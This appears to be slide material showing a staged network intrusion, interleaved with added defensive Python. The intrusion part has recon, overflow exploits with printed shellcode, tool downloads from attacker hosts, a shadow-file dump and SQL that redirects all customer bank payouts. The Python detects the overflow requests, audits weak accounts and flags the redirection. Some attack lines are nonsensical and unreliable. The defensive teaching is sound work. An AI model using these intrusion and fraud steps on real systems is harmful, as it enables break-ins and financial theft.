Title: hacker.com:$

hacker.com:$ nslookup
Default Server:  ns.hacker.com
Address:  3.1.33.7

> www.billionaireshow.com
Non-authoritative answer:
Name:    www.billionaireshow.com
Address:  172.16.16.5

> exit

hacker.com:$ nmap -sS 172.16.16.5

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on www.billionaireshow.com (172.16.16.5):
(The 1514 ports scanned but not shown below are in state: closed)
Port       State       Service
80/tcp     open        http
135/tcp    open        loc-srv
139/tcp    open        netbios-ssn
445/tcp    open        microsoft-ds
1080/tcp   open        socks
8080/tcp   open        http-proxy

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

hacker.com:$ telnet 172.16.16.5 80
Trying 172.16.16.5...
Connected to 172.16.16.5.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 2506
Date: Mon, 01 Oct 2001 15:04:41 GMT
Content-Location: http://172.16.16.5/postinfo.html
Content-Type: text/html
Server: Microsoft-IIS/5.0
Accept-Ranges: bytes
Last-Modified: Mon, 01 Oct 2001 11:06:52 GMT
ETag: "20c1bf347cfc01941"

Connection closed by foreign host.
hacker.com:$ ./idaexploit.sh 172.16.16.5
Connecting . . . Dumping Shell:
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c
\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04
\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99
\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14
\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4
\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9
\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9
\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c
\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf
\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf
\xd9\x99\x34\xc9\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xda\xd4\xdd
\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x99
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99
\x99\x90\x90\x90\x90\x90\x90\x90\x90\x90
Done...
Completing...
... GET /test.ida?perl -e 'print "N"x230'%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5%3Dx HTTP/1.0 ...
... GET /test.ida?perl -e 'print "N"x230'%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%3Dx HTTP/1.0 ...
yahoo perl -e 'print "\x90"x11800'SHELLCODE20 ini.TINY
Binding cmd.exe PORT 80...
Finished...ENJOY!
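The HEAD reply above (the Server header is what the attacker keyed his IIS 5.0 exploit on) and the GET /test.ida?... requests the exploit sends are both things a defender can check for. The Python below is an added example, not part of the original slides or of any tool they show: it parses the HEAD reply into its headers and pulls the Server banner, then scans IIS W3C-style log lines for .ida/.idq requests carrying the overflow's signature (an oversized query, %uXXXX escapes, a long run of one filler byte). The HEAD_RESPONSE bytes, the log lines, their field layout and the thresholds are all constructed here.

```python
import re

# Constructed: the reply to the "HEAD / HTTP/1.0" shown in the transcript,
# as the raw bytes a socket would return.
HEAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 2506\r\n"
    b"Date: Mon, 01 Oct 2001 15:04:41 GMT\r\n"
    b"Content-Location: http://172.16.16.5/postinfo.html\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"Last-Modified: Mon, 01 Oct 2001 11:06:52 GMT\r\n"
    b'ETag: "20c1bf347cfc01941"\r\n'
    b"\r\n"
)


def parse_head_response(raw: bytes) -> dict:
    """Split a raw HTTP response into its status line and a lower-cased header map."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")   # split at the first colon only
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers}


def server_banner(raw: bytes) -> str:
    """The Server header: the one line the attacker needed before picking an exploit."""
    return parse_head_response(raw)["headers"].get("server", "")


# The exploit's request is easy to spot in an IIS log: an .ida/.idq stem with a
# query that is hundreds of bytes of filler plus %uXXXX escapes.
IDA_STEM_RE = re.compile(r"\.id[aq]$", re.IGNORECASE)
UNICODE_ESC_RE = re.compile(r"(?:%u[0-9a-f]{4}){2,}", re.IGNORECASE)
FILLER_RUN_RE = re.compile(r"(.)\1{99,}")        # 100+ copies of one byte


def ida_overflow_reasons(stem: str, query: str) -> list:
    """Why a request looks like the .ida overflow; empty list if it does not."""
    if not IDA_STEM_RE.search(stem):
        return []
    q = "" if query == "-" else query             # W3C logs write "-" for no query
    reasons = []
    if len(q) > 200:                               # assumption: threshold for "oversized"
        reasons.append(f"oversized query ({len(q)} bytes)")
    if UNICODE_ESC_RE.search(q):
        reasons.append("%u-encoded payload")
    if FILLER_RUN_RE.search(q):
        reasons.append("repeated filler byte")
    return reasons


def scan_iis_log(text: str) -> list:
    """Scan lines of the form 'date time c-ip cs-method cs-uri-stem cs-uri-query sc-status'."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):       # skip W3C directive lines
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, src, method, stem, query, status = parts[:7]
        reasons = ida_overflow_reasons(stem, query)
        if reasons:
            hits.append({"time": f"{date} {time}", "src": src, "method": method,
                         "stem": stem, "status": status, "reasons": reasons})
    return hits


# Constructed log lines: the second is the exploit request from the transcript
# with the perl filler expanded to 230 N's; the last is a benign .ida request.
EXPLOIT_QUERY = "N" * 230 + "%u0101%u00b5" * 4 + "%3Dx"
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-10-01 15:04:41 10.0.0.7 HEAD / - 200",
    "2001-10-01 15:05:02 10.0.0.7 GET /test.ida " + EXPLOIT_QUERY + " 500",
    "2001-10-01 15:06:11 10.0.0.9 GET /default.htm - 200",
    "2001-10-01 15:07:30 10.0.0.9 GET /test.ida perl=1 200",
])

if __name__ == "__main__":
    print("banner:", server_banner(HEAD_RESPONSE))
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["time"], hit["src"], hit["stem"], ", ".join(hit["reasons"]))
```

The benign /test.ida line is there on purpose: matching on the stem alone would page on every legitimate index-server query, so the detector requires one of the three payload traits as well.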
C:\WINNT\system32>
C:\WINNT\system32>cd ..
C:\WINNT>dir
 Volume in drive C has no label.
 Volume Serial Number is 6446-0F57

 Directory of C:\WINNT

08/24/2001  07:23p                  36 vb.ini
08/24/2001  07:23p                  37 vbaddin.ini
12/06/1999  05:00p              20,240 vmmreg32.dll
12/06/1999  05:00p             366,864 welcome.exe
12/06/1999  05:00p                  23 welcome.ini
09/07/2001  02:00p                 348 win.ini
12/06/1999  05:00p             256,192 winhelp.exe
07/21/2000  12:05p             269,584 winhlp32.exe
07/21/2000  12:05p             193,296 winrep.exe
09/28/2001  04:41p             288,880 WMSysPrx.prx
12/06/1999  05:00p               9,522 Zapotec.bmp
12/06/1999  05:00p                 707 _default.pif
              70 File(s)      3,934,990 bytes
              29 Dir(s)   7,330,738,176 bytes free

C:\WINNT\system32>
C:\WINNT\system32>tftp.exe -i hackerbox.com GET nmap.exe c:\temp\nmap.exe
C:\WINNT\system32>cd \temp
C:\temp>nmap -sP 172.16.16.1-255

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Host www.billionaireshow.com (172.16.16.5) appears to be up.
Host itguy.billionaireshow.com (172.16.16.176) appears to be up.
Nmap run completed -- 255 IP addresses (2 host(s) up) scanned in 7 seconds

C:\temp>
C:\temp>nmap -O 172.16.16.176

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on itguy.billionaireshow.com (172.16.16.176):
(The 1514 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftpd
22/tcp     open        ssh
4045/tcp   open        lockd
6112/tcp   open        dtspc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=33565 (Worthy challenge)
Remote OS guesses: Solaris 8

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

C:\temp>ftp 172.16.16.176
Connected to 172.16.16.176.
220 itguy.billionaireshow.com FTP server ready.
Name (172.16.16.176:hacker): ^C

C:\temp>perl glob.pl 172.16.16.176 anonymous glob@glob.com
RET 0xbfbfeae8 Align 1
RET 0x805baf8 Align 1
RET 0x805e23a Align 1
220 itguy.billionaireshow.com FTP server (Version 6.00LS) ready.
Logged in as anonymous/glob@glob.com.
Sending evil STAT command.
Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc
\x68\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c
\x24\x04\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e
\x88\x53\x01\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9
\xc3\x55\x89\xe5\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
whoami
root
Solaris 8
nslookup
Default Server:  billionaireshow.com
Address:  172.16.15.2

> ls billionaireshow.com
[billionaireshow.com]
 billionaireshow.com.          NS     server = ns.billionaireshow.com
 billionaireshow.com.          NS     server = game.ec.billionaireshow.com
 billiondollar                 MX     server = mail.billionaireshow.com
 ap.billionaireshow.com        A      172.16.7.14
 game.ec.billionaireshow.com   A      172.16.7.22
> exit
telnet 172.16.16.14 22
Trying 172.16.16.14...
Connected to 172.16.16.14.
Escape character is '^]'.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)
Connection closed by foreign host.

ssh -l lp ap.billionaireshow.com
lp's password:
Authentication successful.
Last login: Sun Mar 28 2001 16:43:05 -0500 from 209.134.176.54
lp@AP:/home$
lp@AP:/home$ uname -a
SunOS ap 5.8 Generic_105181-23 sun4u sparc SUNW,UltraSPARC-IIi-Engine
lp@AP:/home$
cd /
lp@AP:/$ ls
bam  etc  lost+found  root  tmp  bin  home  mnt  usr  boot  opt  proc  sbin  dev  lib  var  vakkk  oracle9  idxs
lp@AP:/$ cd /tmp
lp@AP:/tmp$
ftp hackertoolz.com
Connected to hackertoolz.com.
220 SMACK FTP server (Version 5.6(1) Tue Jun 27 10:52:28 PDT 2000) ready.
Name (hackertoolz.com:lp): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> get dtprintinfoBO.c
200 PORT command successful.
150 ASCII data connection for chghost (hackertoolz.com,32793) (1511 bytes).
226 ASCII Transfer complete.
local: dtprintinfoBO.c remote: dtprintinfoBO.c
1558 bytes received in 0.014 seconds (107.57 Kbytes/s)
ftp> bye
221 Goodbye.
lp@ap:/tmp$ gcc -o sploit dtprintinfoBO.c
lp@ap:/tmp$ ./sploit
HACKBOX...admintool Overflow Exploits.
creating...ADJUST12.......done
creating...ADJUST21.......done
creating...BUFSIZE11000.......done
creating...BUFSIZE2800.......done
creating...OFFSET3600.......done
creating...OFFSET2400....done
Sending Shell.......
\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15
\xe3\x68\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x10\x20\x10
\x94\x22\xa0\x10\x9c\x03\xa0\x14\xec\x3b\xbf\xec\xc0\x23
\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b
\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0
\x20\x08
....done
ENJOY YOUR NEW BOX!
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
head /etc/shadow
root:h1QbJ57QWWmVY:11177:0
bin:*:11038:0:99999:7
daemon:*:11038:0:99999:7
adm:*:11038:0:99999:7
lp:*:11038:0:99999:7
sync:*:11038:0:99999:7
shutdown:*:11038:0:99999:7
halt:*:11038:0:99999:7
mail:*:11038:0:99999:7
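The passwd and shadow dump above is exactly what an administrator should audit before an attacker reads it: lp is a service account with /bin/bash, and earlier in the deck an ssh login as lp succeeded with a password. The Python below is an added example, not from the slides: it parses both files and flags service accounts that can log in, traditional 13-character DES hashes, empty passwords and extra uid 0 accounts. The file contents are constructed to mirror the transcript; the hash given to lp, the uid cut-off of 99 and the set of non-login shells are assumptions.

```python
# Constructed copies of the two files dumped above. PASSWD mirrors the
# transcript; SHADOW is constructed so that lp carries a usable DES-style
# hash, matching the password login over ssh earlier in the deck (the hash
# value itself is made up).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
"""

SHADOW = """\
root:h1QbJ57QWWmVY:11177:0:99999:7:::
bin:*:11038:0:99999:7:::
daemon:*:11038:0:99999:7:::
adm:*:11038:0:99999:7:::
lp:lpXkq3bZ9QrSA:11038:0:99999:7:::
sync:*:11038:0:99999:7:::
shutdown:*:11038:0:99999:7:::
halt:*:11038:0:99999:7:::
mail:*:11038:0:99999:7:::
"""

# Shells that cannot give an interactive session. An empty shell field means
# the system default (/bin/sh), so it is deliberately not in this set.
NON_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                    "/bin/sync", "/sbin/shutdown", "/sbin/halt"}
SYSTEM_UID_MAX = 99   # assumption: service accounts live below uid 100


def parse_colon_file(text):
    """Rows of a colon-separated file, skipping blanks and comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]


def hash_kind(field):
    """Classify a shadow password field."""
    if field == "":
        return "empty"                           # login with no password at all
    if field[0] in "*!":
        return "locked"                          # *, !, !! and !<hash> all lock
    if field.startswith("$"):
        return "crypt$" + field.split("$")[1]    # $1$ md5, $5$ sha256, $6$ sha512
    if len(field) == 13:
        return "des"                             # traditional crypt(3): 8-char limit
    return "unknown"


def audit_accounts(passwd_text, shadow_text):
    """Return findings as dicts with user, code and detail."""
    shadow = {row[0]: (row[1] if len(row) > 1 else "")
              for row in parse_colon_file(shadow_text)}
    findings = []
    for row in parse_colon_file(passwd_text):
        if len(row) != 7:
            continue                             # malformed line, not our concern here
        name, _, uid, _, _, _, shell = row
        kind = hash_kind(shadow.get(name, "*"))  # absent from shadow: treat as locked
        can_login = shell not in NON_LOGIN_SHELLS and kind != "locked"
        if uid == "0" and name != "root":
            findings.append({"user": name, "code": "uid0-alias",
                             "detail": "second uid 0 account"})
        if name != "root" and int(uid) <= SYSTEM_UID_MAX and can_login:
            findings.append({"user": name, "code": "service-login",
                             "detail": f"shell {shell or '/bin/sh'} with {kind} password"})
        if kind == "empty":
            findings.append({"user": name, "code": "empty-password",
                             "detail": "no password set"})
        if kind == "des":
            findings.append({"user": name, "code": "des-hash",
                             "detail": "traditional DES crypt, trivially brute-forced"})
    return findings


if __name__ == "__main__":
    for f in audit_accounts(PASSWD, SHADOW):
        print(f"{f['user']:<10} {f['code']:<15} {f['detail']}")
```

On the constructed input the checks single out lp (login shell plus a live password on a uid below 100) and the DES hashes on root and lp; the locked system accounts produce nothing even though bin, daemon and adm have an empty (default) shell.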
sqlplus
SQL> describe accounts
 Name            Null?    Type
 --------------- -------- ------------
 LNAME           NOT NULL VARCHAR2(20)
 FNAME           NOT NULL VARCHAR2(15)
 ADDR1           NOT NULL VARCHAR2(30)
 ADDR2           NOT NULL VARCHAR2(30)
 ZIP             NOT NULL NUMBER(5)
 PHONE           NOT NULL CHAR(12)
 SSN             NOT NULL NUMBER(9)
 BANK            NOT NULL VARCHAR2(30)
 ROUTING_NUM     NOT NULL NUMBER(9)
 ACCOUNT_NUM     NOT NULL NUMBER(12)

SQL> select ACCOUNT_NUM, ROUTING_NUM from accounts;
ACCOUNT_NUM  ROUTING_NUM
------------ -----------
8811101011   060101015
8822822281   060192911
4922929481   069882211
5594492295   069592215
6839186571   062798581
3985792816   061873710
220985949922 320984581
2092028481   204098285
6096780914   098029820
4098320921   450982091
6098509449   095098209
4090921109   609830329
6987329810   908848828
4987298731   984598472
5098222091   095509860
0983039311   098098571

SQL> update accounts set ACCOUNT_NUM = 0069858915 where LNAME <> '';
SQL> update accounts set ROUTING_NUM = 6695922941 where LNAME <> '';
SQL> select LNAME, ACCOUNT_NUM, ROUTING_NUM from accounts where LNAME <> '';
LNAME      ACCOUNT_NUM  ROUTING_NUM
---------- ------------ -----------
Young      0069858915   6695922941
Varick     0069858915   6695922941
Brantley   0069858915   6695922941
Weinstein  0069858915   6695922941
Davis      0069858915   6695922941
Reynard    0069858915   6695922941
Halpert    0069858915   6695922941
Davis      0069858915   6695922941
Kennedy    0069858915   6695922941
Scott      0069858915   6695922941
Michaels   0069858915   6695922941
Noojin     0069858915   6695922941
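The two UPDATEs above point every customer's payout at one bank account, and the final SELECT is the only thing in the deck that shows it. As an added example (not part of the slides; SQLite stands in for Oracle and every row is constructed), the Python below rebuilds a cut-down ACCOUNTS table, runs the same mass UPDATE, and shows two checks that catch it: a diff against a baseline of who pays out where, and a GROUP BY that finds a destination shared by more customers than one household. The customer rows, the column subset and the one-holder threshold are assumptions.

```python
import sqlite3

# Constructed stand-in for the ACCOUNTS table in the sqlplus session (SQLite,
# not Oracle); columns the checks do not need are left out.
SCHEMA = """
CREATE TABLE accounts (
    LNAME       VARCHAR(20) NOT NULL,
    FNAME       VARCHAR(15) NOT NULL,
    BANK        VARCHAR(30) NOT NULL,
    ROUTING_NUM INTEGER     NOT NULL,
    ACCOUNT_NUM INTEGER     NOT NULL
)
"""

# Constructed customers: each pays out to a different destination.
SEED = [
    ("Young",     "Ann", "First Bank", 60101015, 8811101011),
    ("Varick",    "Bo",  "First Bank", 60192911, 8822822281),
    ("Brantley",  "Cy",  "Metro CU",   69882211, 4922929481),
    ("Weinstein", "Di",  "Metro CU",   69592215, 5594492295),
    ("Davis",     "Ed",  "Coast Bank", 62798581, 6839186571),
    ("Davis",     "Flo", "Coast Bank", 61873710, 3985792816),
]


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    con.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?, ?)", SEED)
    con.commit()
    return con


def snapshot(con):
    """Baseline of who pays out where, keyed by customer."""
    rows = con.execute("SELECT LNAME, FNAME, ROUTING_NUM, ACCOUNT_NUM FROM accounts")
    return {(ln, fn): (rt, ac) for ln, fn, rt, ac in rows}


def redirect_all_payouts(con, account_num, routing_num):
    """The two UPDATEs from the sqlplus session, folded into one. Returns rows touched."""
    cur = con.execute(
        "UPDATE accounts SET ACCOUNT_NUM = ?, ROUTING_NUM = ? WHERE LNAME <> ''",
        (account_num, routing_num))
    con.commit()
    return cur.rowcount


SHARED_DESTINATION_SQL = """
SELECT ROUTING_NUM, ACCOUNT_NUM, COUNT(DISTINCT LNAME || '/' || FNAME) AS holders
FROM accounts
GROUP BY ROUTING_NUM, ACCOUNT_NUM
HAVING COUNT(DISTINCT LNAME || '/' || FNAME) > ?
ORDER BY holders DESC
"""


def shared_destinations(con, max_holders=1):
    """Destinations used by more distinct customers than max_holders."""
    return [tuple(r) for r in con.execute(SHARED_DESTINATION_SQL, (max_holders,))]


def changed_destinations(con, baseline):
    """Customers whose destination differs from the baseline snapshot."""
    now = snapshot(con)
    return sorted(k for k, v in now.items() if baseline.get(k) != v)


if __name__ == "__main__":
    con = build_db()
    base = snapshot(con)
    print("shared before:", shared_destinations(con))
    # The values are the ones typed in the transcript; NUMBER columns drop
    # the leading zeros of 0069858915.
    print("rows redirected:", redirect_all_payouts(con, 69858915, 6695922941))
    print("shared after: ", shared_destinations(con))
    print("changed:      ", changed_destinations(con, base))
```

Either check alone is enough to raise an alarm on a nightly job; the baseline diff also tells you which customers to contact. One caveat on the WHERE clause: Oracle treats '' as NULL, so LNAME <> '' matches no rows there, while SQLite compares it as an empty string and the statement touches every row, as it does in the transcript.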